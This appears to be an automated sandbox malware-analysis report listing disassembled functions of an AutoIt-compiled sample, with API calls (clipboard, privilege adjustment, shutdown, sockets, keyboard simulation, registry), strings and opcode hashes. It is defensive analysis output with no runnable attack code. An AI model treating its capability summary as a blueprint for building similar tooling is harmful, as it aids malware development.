                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            APIs
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            APIs
                                                              • Part of subcall function 00007FF7EC154970: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EC154999
                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF7EC16C8FE), ref: 00007FF7EC12656F
                                                            Similarity
                                                            • API ID: FreeLibrary_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3938577545-0
                                                            APIs
                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7EC144C5C
                                                              • Part of subcall function 00007FF7EC145600: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7EC145609
                                                              • Part of subcall function 00007FF7EC145600: _CxxThrowException.LIBVCRUNTIME ref: 00007FF7EC14561A
                                                            Similarity
                                                            • API ID: Concurrency::cancel_current_taskExceptionThrowstd::bad_alloc::bad_alloc
                                                            • String ID:
                                                            • API String ID: 1680350287-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            APIs
                                                            Similarity
                                                            • API ID: LongNamePath
                                                            • String ID:
                                                            • API String ID: 82841172-0
                                                            APIs
                                                            Similarity
                                                            • API ID: IconNotifyShell_
                                                            • String ID:
                                                            • API String ID: 1144537725-0
                                                            APIs
                                                            Similarity
                                                            • API ID: Open_onexit
                                                            • String ID:
                                                            • API String ID: 3030063568-0
                                                            APIs
                                                            Similarity
                                                            • API ID: _onexit
                                                            • String ID:
                                                            • API String ID: 572287377-0
                                                            APIs
                                                            Similarity
                                                            • API ID: _onexit
                                                            • String ID:
                                                            • API String ID: 572287377-0
                                                            APIs
                                                            Similarity
                                                            • API ID: Process$CurrentVersionWow64_onexit
                                                            • String ID:
                                                            • API String ID: 2932345936-0
                                                            APIs
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID:
                                                            • API String ID: 1452528299-0
                                                            APIs
                                                            Similarity
                                                            • API ID: AllocHeap
                                                            • String ID:
                                                            • API String ID: 4292702814-0
                                                            APIs
                                                            Similarity
                                                            • API ID: AllocHeap
                                                            • String ID:
                                                            • API String ID: 4292702814-0
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                            • API String ID: 2211948467-2373415609
                                                            APIs
                                                            Similarity
                                                            • API ID: DeleteDestroyIconImageLoadLongMessageObjectSendWindow
                                                            • String ID:
                                                            • API String ID: 3481653762-0
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: MessageSend$Window$LongMenuText$CharInfoItemNextwsprintf
                                                            • String ID: %d/%02d/%02d
                                                            • API String ID: 1218376639-328681919
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Window$MessageSend$Menu$Item$EnableInfoMove$DefaultShow$DrawFocusLongRect
                                                            • String ID: P
                                                            • API String ID: 1208186926-3110715001
                                                            • Opcode ID: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
                                                            • Instruction ID: aff9843c016a8d6cfc3b877139f0fb152778aba3244f71ce10c822f439210734
                                                            • Opcode Fuzzy Hash: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
                                                            • Instruction Fuzzy Hash: 1B1218FAB0864286E728AB25F454BBDA7A0FF85794F900536EA4D17A94CF3CE441C721
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 3778422247-2988720461
                                                            • Opcode ID: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
                                                            • Instruction ID: c0ff6fcbdc58be2a7dfd236fe4cec3da74967428f32ccb441a9a35a9139d9ce0
                                                            • Opcode Fuzzy Hash: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
                                                            • Instruction Fuzzy Hash: 1C416AE9F0CA1243F714AB25B914739A792BF88B82FD45037C90A47B58DE3D944AC762
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Process$StationWindow$CloseCurrentHandleUser$CreateDuplicate$BlockDesktopEnvironmentHeapOpenProfileToken$AdjustAllocDestroyErrorLastLoadLogonLookupPrivilegePrivilegesThreadUnloadValuewcscpy
                                                            • String ID: default$winsta0$winsta0\default
                                                            • API String ID: 3202303201-1423368268
                                                            • Opcode ID: de7527ded46d2e32930649954c580003a2a01d55c070abe543a614e541a7caf5
                                                            • Instruction ID: c7b8d2aafb44b56e9ae22a548a16eb2a2b58fa38b7e44f4c30cc5f54b00c8a00
                                                            • Opcode Fuzzy Hash: de7527ded46d2e32930649954c580003a2a01d55c070abe543a614e541a7caf5
                                                            • Instruction Fuzzy Hash: 09A15DBAA0CB4286E710EF65B5403A9A7A1FF85794F840136EE5D4BB98CF3CE005C712
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                            • String ID: AutoIt v3 GUI
                                                            • API String ID: 1458621304-248962490
                                                            • Opcode ID: b8f5b06e3d0277f3ffc73035af6cc9ad4e685f54e981a48a8f38e285d267cba3
                                                            • Instruction ID: 353c05f42271c44f14d301f52e4c3020f44b4fc2eb5a6083c5aa4320591ccb87
                                                            • Opcode Fuzzy Hash: b8f5b06e3d0277f3ffc73035af6cc9ad4e685f54e981a48a8f38e285d267cba3
                                                            • Instruction Fuzzy Hash: CFD192BAA04A42CAE714EF38E8507AC77A1FB44B59F900136DA1E477A8DF3CE444C751
                                                            APIs
                                                            Similarity
                                                            • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                            • String ID:
                                                            • API String ID: 3222323430-0
                                                            • Opcode ID: 9b87d7956825108095e474127530b25728a3743fc17a6d5c8f31ecbd5b711407
                                                            • Instruction ID: 95ddd82653238c60d7f872654d1bbb87307553d473468012f8ca9b82a6dc8d2f
                                                            • Opcode Fuzzy Hash: 9b87d7956825108095e474127530b25728a3743fc17a6d5c8f31ecbd5b711407
                                                            • Instruction Fuzzy Hash: 24717CE9A08A42C2EA24BB15F45437DA761FF84B85FC0403AD95E037A5DF3CE606C762
                                                            APIs
                                                            Similarity
                                                            • API ID: MessageSend$Menu$InfoItemTextWindow$CharDrawInvalidateNextRect
                                                            • String ID:
                                                            • API String ID: 1015379403-0
                                                            • Opcode ID: 811f6ddedc4938916125b3772b32f534d797e58df8d8128b9f335a51bc1c3411
                                                            • Instruction ID: 586508e9171ac27cfd5d8c5311050b205db019d77772c8a4fb53e004ca1f8504
                                                            • Opcode Fuzzy Hash: 811f6ddedc4938916125b3772b32f534d797e58df8d8128b9f335a51bc1c3411
                                                            • Instruction Fuzzy Hash: F802F7B9A0878285EB24AF24B454BBDA761FB44794F984133EA5D07BD4CF3CE941C722
                                                            APIs
                                                            Similarity
                                                            • API ID: Cursor$Load$ErrorInfoLast
                                                            • String ID:
                                                            • API String ID: 3215588206-0
                                                            • Opcode ID: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                            • Instruction ID: 8cddf40949f7dd6e62c52bc0b92a4bed8c572ba6eb3a8c6f34e61542aa0b8578
                                                            • Opcode Fuzzy Hash: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                            • Instruction Fuzzy Hash: 87515EBAB0CB028AEB44AB64F45837D6BA1EB49745F50443AD90E83788DE7CE455C315
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: CloseValue$ConnectCreateRegistry
                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                            • API String ID: 3314541760-966354055
                                                            • Opcode ID: 8da99fa8f9cfa95644d42f55175067c4e32022aa9dc53b987727f765eeff7340
                                                            • Instruction ID: 78a98b0e3b83e5417cc338d9f44b8b23d920e03c690fbc28889169a643d82696
                                                            • Opcode Fuzzy Hash: 8da99fa8f9cfa95644d42f55175067c4e32022aa9dc53b987727f765eeff7340
                                                            • Instruction Fuzzy Hash: 130271AAB08B82C5EB14FF25E4507ADB7A0FB88B88B858432EE0D47756DF38D545C351
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: P
                                                            • API String ID: 0-3110715001
                                                            • Opcode ID: 89df1471032732431b81a05b11aefcbbc91b985f9c802d2c82d041fa720837f2
                                                            • Instruction ID: dc514a76b69ecfa2a76856d94bf24ad52f12b5f184a5364abf4107d2d7b896fb
                                                            • Opcode Fuzzy Hash: 89df1471032732431b81a05b11aefcbbc91b985f9c802d2c82d041fa720837f2
                                                            • Instruction Fuzzy Hash: 76A1D3BAA0864186E728EF25E4543BAFB61FB84788F908137DA4E03A94DF7CE445C711
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                                                            • String ID: -$:$:$?
                                                            • API String ID: 3440502458-92861585
                                                            • Opcode ID: 2484a17d68417765dfea95e8ed30be907b8393143ee9075556b7ff4147a9153c
                                                            • Instruction ID: 1fe7675c0034c7a329be8bc34585fcebb34d59c393ac1709d5b8194721f13bc5
                                                            • Opcode Fuzzy Hash: 2484a17d68417765dfea95e8ed30be907b8393143ee9075556b7ff4147a9153c
                                                            • Instruction Fuzzy Hash: 24E1F2BAA0828286F720EF35B8517B9B794BF84788FD45137EA4D42A95DF3CD441C722
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                            • String ID: *.*
                                                            • API String ID: 1409584000-438819550
                                                            • Opcode ID: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
                                                            • Instruction ID: 5b836806d0bc6daccea8454a9231b3778b0f07444e27b1da1bd2bb33a063f68a
                                                            • Opcode Fuzzy Hash: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
                                                            • Instruction Fuzzy Hash: 0D41B4A960864294EB40AB15F8443B9E7A4FF44BA5FC88133DD6D47698DF3CD40AC722
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                            • String ID: *.*
                                                            • API String ID: 2640511053-438819550
                                                            • Opcode ID: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                            • Instruction ID: 086f5257da01af9f7d478d32f4ed860649803ff235352a7718f66727deda370d
                                                            • Opcode Fuzzy Hash: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                            • Instruction Fuzzy Hash: 7741709960CA4291EA50AB15B8447B9E790FF44BE5FC44133DD6D076E9EF3CD40ACB22
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                            • String ID: :$\$\??\%s
                                                            • API String ID: 3827137101-3457252023
                                                            • Opcode ID: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                            • Instruction ID: 008bbed4630d98bad3b6feddb4e36a46ead181a8418cc397cf41716f8ae6bae1
                                                            • Opcode Fuzzy Hash: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                            • Instruction Fuzzy Hash: 6C41A4A661868385E720AF21F8007FDA7A0FF85799F940136DA0D47BA8DF7CD546C712
                                                            APIs
                                                            Similarity
                                                            • API ID: QueryValue$Close$BuffCharConnectOpenRegistryUpper
                                                            • String ID:
                                                            • API String ID: 3218304859-0
                                                            APIs
                                                            Similarity
                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                            • String ID:
                                                            • API String ID: 2762341140-0
                                                            APIs
                                                            Similarity
                                                            • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                            • String ID:
                                                            • API String ID: 1255039815-0
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                            • API String ID: 4194297153-14809454
                                                            APIs
                                                            Similarity
                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                            • String ID:
                                                            • API String ID: 2395222682-0
                                                            APIs
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow
                                                            • String ID:
                                                            • API String ID: 312131281-0
                                                            APIs
                                                            Similarity
                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                            • String ID:
                                                            • API String ID: 1737998785-0
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                                                            • String ID: ?
                                                            • API String ID: 500310315-1684325040
                                                            APIs
                                                            Similarity
                                                            • API ID: ErrorLast$closesocket$bindlistensocket
                                                            • String ID:
                                                            • API String ID: 540024437-0
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                            • API String ID: 0-572801152
                                                            APIs
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 2649000838-1173974218
                                                            APIs
                                                            Similarity
                                                            • API ID: Window$PerformanceQuery$CounterRectmouse_event$CursorDesktopForegroundFrequencySleep
                                                            • String ID:
                                                            • API String ID: 383626216-0
                                                            APIs
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 1239891234-0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState
                                                            • String ID: *.*
                                                            • API String ID: 1927845040-438819550
                                                            • Opcode ID: 6a88b2503df8e5f85dd4c462440c0fc5a039f53792e222b5ac7c7da246e49fe0
                                                            • Instruction ID: 528d88e2073d6f13bd998092febb952923345880fd36ec971563365ea5569436
                                                            • Opcode Fuzzy Hash: 6a88b2503df8e5f85dd4c462440c0fc5a039f53792e222b5ac7c7da246e49fe0
                                                            • Instruction Fuzzy Hash: 1951C16A608B8285EB10EB15F8403ADA7B0FB45794F940133DE5D03799DF3CE959CB22
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ERCP$PCRE$VUUU$VUUU$VUUU$VUUU
                                                            • API String ID: 0-2187161917
                                                            • Opcode ID: 52bbb01250ada343afc02eebb5c988e0963da5400e9343603d667423943af628
                                                            • Instruction ID: b7eb724a8d6d23e8d6fda8aeafd73de3f591d06d559076e8e5e0df423df1066b
                                                            • Opcode Fuzzy Hash: 52bbb01250ada343afc02eebb5c988e0963da5400e9343603d667423943af628
                                                            • Instruction Fuzzy Hash: ECB2C5BAE08691CAFB249F64A4107BDB7A1FB44788F904137EA4D57B84DF38E841D712
                                                            APIs
                                                            Similarity
                                                            • API ID: ErrorLastinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 4170576061-0
                                                            • Opcode ID: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
                                                            • Instruction ID: 6a6ec68670590f297b2ea0fa50f9d4dd05e4a08a574efdd4fa0f586083f54746
                                                            • Opcode Fuzzy Hash: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
                                                            • Instruction Fuzzy Hash: F751B2AAB08652C1DB14FB16F4047A9AB90BB89FE4FC58532DE5E07796CE3CD500C791
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: CreateInitializeInstanceUninitialize
                                                            • String ID: .lnk
                                                            • API String ID: 948891078-24824748
                                                            • Opcode ID: bb49a61337d89a9848f7780026d10ac62e6b3b39f2b5ab5deb7fc3459a4390ae
                                                            • Instruction ID: d34ed836470d315109bc9153de7c81b408bceb09b2fb9250feddb19d05884926
                                                            • Opcode Fuzzy Hash: bb49a61337d89a9848f7780026d10ac62e6b3b39f2b5ab5deb7fc3459a4390ae
                                                            • Instruction Fuzzy Hash: 5DD192AAB18B4681EB14FB15E4907EDAB60FB80BC8F805032EE4E47B65EE3CD545C751
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _handle_error
                                                            • String ID: !$VUUU$fmod
                                                            • API String ID: 1757819995-2579133210
                                                            • Opcode ID: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
                                                            • Instruction ID: 963011008aeaf6100f1425a6521bccc16e413b4ac0efe0fb177942a991606725
                                                            • Opcode Fuzzy Hash: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
                                                            • Instruction Fuzzy Hash: 4DB11865E2CFC545D6A39A3860013B6F259AFAA390F54C333EA5E35BA0DF3C9582C741
                                                            APIs
                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EC162D60
                                                              • Part of subcall function 00007FF7EC15B184: GetCurrentProcess.KERNEL32(00007FF7EC15B21D), ref: 00007FF7EC15B1B1
                                                            Strings
                                                            Similarity
                                                            • API ID: CurrentProcess_invalid_parameter_noinfo
                                                            • String ID: *$.$.
                                                            • API String ID: 2518042432-2112782162
                                                            • Opcode ID: 10686662bc6c287608bb1927b489f0d8a7225314f89d29ff6f04aab4d96db585
                                                            • Instruction ID: 95cb598f9a9aecceaa7c1afb2234178cfc3fdb2dcd3be8a64d756ca0689c1a6b
                                                            • Opcode Fuzzy Hash: 10686662bc6c287608bb1927b489f0d8a7225314f89d29ff6f04aab4d96db585
                                                            • Instruction Fuzzy Hash: 1D51B1A6F14A5585FB10EBA6E8402BDB7A4BB44BC8F944536DE4D17B85DE38D042C322
                                                            APIs
                                                            Similarity
                                                            • API ID: _get_daylight$_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 1286766494-0
                                                            • Opcode ID: ff66785d1f33ad73d5007bcee94c477568ce16377581ab8ae86a17e1b75de420
                                                            • Instruction ID: 104069fb7045d926dc6eae154bef4b214c1774b7aa5aa94cafde1a8c2263c8cc
                                                            • Opcode Fuzzy Hash: ff66785d1f33ad73d5007bcee94c477568ce16377581ab8ae86a17e1b75de420
                                                            • Instruction Fuzzy Hash: 93A2C2BAA087428AE724AF28F4502BDB7A1FB45788F944136DB4D07B98DF3DD511C722
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: System$AdjustErrorExitInitiateLastLookupPowerPrivilegePrivilegesShutdownStateTokenValueWindows
                                                            • String ID: SeShutdownPrivilege
                                                            • API String ID: 2163645468-3733053543
                                                            • Opcode ID: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
                                                            • Instruction ID: 5af5ad411058d941f2ed9f23691e97d758be30aaf85b2bd85bbc7f6aae747ef9
                                                            • Opcode Fuzzy Hash: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
                                                            • Instruction Fuzzy Hash: DC11C477B1860282E724FB29F4402BEE262BF80754F844137E54D83A99EF3CD805C751
                                                            APIs
                                                            Strings
                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF7EC145C43
                                                            Similarity
                                                            • API ID: DebugDebuggerErrorLastOutputPresentString
                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                            • API String ID: 389471666-631824599
                                                            • Opcode ID: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                            • Instruction ID: abde9d8c2e397f0181babc4b3823ca22df5b826360215dbc7ed18d9852788388
                                                            • Opcode Fuzzy Hash: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                            • Instruction Fuzzy Hash: 6B11737AA14B4297F704EB22E6543B9B3A4FF44346F804136D64D46A54EF3CE0B4C722
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-1355242751
                                                            • Opcode ID: f93d3ff0ce366ab95d7e6c8a1355595afc9dd02f208f5495b2fec8b10b31cda7
                                                            • Instruction ID: 662c3cf0e4f62d7c2b1d842c399c9208caf4e9e9b12df734fb0ee2223aaf6343
                                                            • Opcode Fuzzy Hash: f93d3ff0ce366ab95d7e6c8a1355595afc9dd02f208f5495b2fec8b10b31cda7
                                                            • Instruction Fuzzy Hash: ACE0EDA9905B0A92EF19AB10F4553A867E4FB08B8AF940436C95D453A8EF7CD5A4C321
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Init_thread_footer
                                                            • String ID: Variable must be of type 'Object'.
                                                            • API String ID: 1385522511-109567571
                                                            • Opcode ID: 67ca3e7a743f78d31b90d9fea182e781eb55d1361cb2596d54cba276c749d1dc
                                                            • Instruction ID: af82d100fd591a3697d2597dc5dddcbfc444011953d1d3ad0edeb4bc4612444b
                                                            • Opcode Fuzzy Hash: 67ca3e7a743f78d31b90d9fea182e781eb55d1361cb2596d54cba276c749d1dc
                                                            • Instruction Fuzzy Hash: 64C2C4BAA0868286EB64EF19E4413B9B3A1FB44B88FD54133DA4D47795DF3CE841C316
                                                            APIs
                                                            Similarity
                                                            • API ID: Variant$ClearInit$CopyCreateInitializeInstanceUninitialize
                                                            • String ID:
                                                            • API String ID: 2733932498-0
                                                            • Opcode ID: a09277b6a6935f26de9d5b61002aef5de2559b3d5eb22cd3cc7460a06f749bcb
                                                            • Instruction ID: e9b2ac2f2ed95c786d86291e14d16cfd07c0c6be0355998a5dafa9e94fdac900
                                                            • Opcode Fuzzy Hash: a09277b6a6935f26de9d5b61002aef5de2559b3d5eb22cd3cc7460a06f749bcb
                                                            • Instruction Fuzzy Hash: 22B16CAAB04B56C5EB14AF26E4907ADA7A0FB48FD4F859037DE0E47796CE38D440C321
                                                            APIs
                                                            Similarity
                                                            • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
                                                            • String ID:
                                                            • API String ID: 2000298826-0
                                                            • Opcode ID: 5b1cc7803f552fdfb6a5c1b64286c224a353268d24a72ba4bd1cd77bb81f450c
                                                            • Instruction ID: a7a47c0a5ff6a1fbedbe05ba07c9cf79ddbcc7d54f7337c9dc4090742780989d
                                                            • Opcode Fuzzy Hash: 5b1cc7803f552fdfb6a5c1b64286c224a353268d24a72ba4bd1cd77bb81f450c
                                                            • Instruction Fuzzy Hash: B171827AA18B81C6E704EB25E4443AEB7A0FB88B88F904136EE4D07769DF7CD505C751
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: DEFINE$x
                                                            • API String ID: 0-4035502692
                                                            • Opcode ID: ef8c6a1001600b964e5fbe2637a07538f3dd4599c6cbe193d186c423f91508d7
                                                            • Instruction ID: 82a7778eda7d9fea0ff2391e0d8cfd82eed96f187d7eaac1d26ce8144cfa9e37
                                                            • Opcode Fuzzy Hash: ef8c6a1001600b964e5fbe2637a07538f3dd4599c6cbe193d186c423f91508d7
                                                            • Instruction Fuzzy Hash: E553ADBBB086528AE760DF25E5407BC77A1FB04B88F918036DE495B784EF38E941C752
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Init_thread_footer
                                                            • String ID:
                                                            • API String ID: 1385522511-0
                                                            • Opcode ID: 60f9666ca451ed35fe8ab7f9d9e10171ddfa37ac04d0aa9f8a10e9c9a443c8f8
                                                            • Instruction ID: 5ae932407c885bce04e31f84ed650b56af84861e86041c39371d9835b5e577d0
                                                            • Opcode Fuzzy Hash: 60f9666ca451ed35fe8ab7f9d9e10171ddfa37ac04d0aa9f8a10e9c9a443c8f8
                                                            • Instruction Fuzzy Hash: 0B826BBAA08A4286EB54EF19F484779A7A4FB44B88F964037DE4D47794DF3CE441C322
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $[$\
                                                            • API String ID: 0-3681541464
                                                            • Opcode ID: f7681cbd2ea07fa149fa3418819e144fbe1fe0a990a0ed3c69471eaae0dbb131
                                                            • Instruction ID: 9dae9cf4d0cc372f8ff68d9fdb66510204ee263b35138aca1a7698cc0f76e9b0
                                                            • Opcode Fuzzy Hash: f7681cbd2ea07fa149fa3418819e144fbe1fe0a990a0ed3c69471eaae0dbb131
                                                            • Instruction Fuzzy Hash: 50B28DBBB087528AE7249F65E5407AC77B1FB04788F914136DA0D5BB88EF38E841C752
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: memcpy_s
                                                            • String ID:
                                                            • API String ID: 1502251526-0
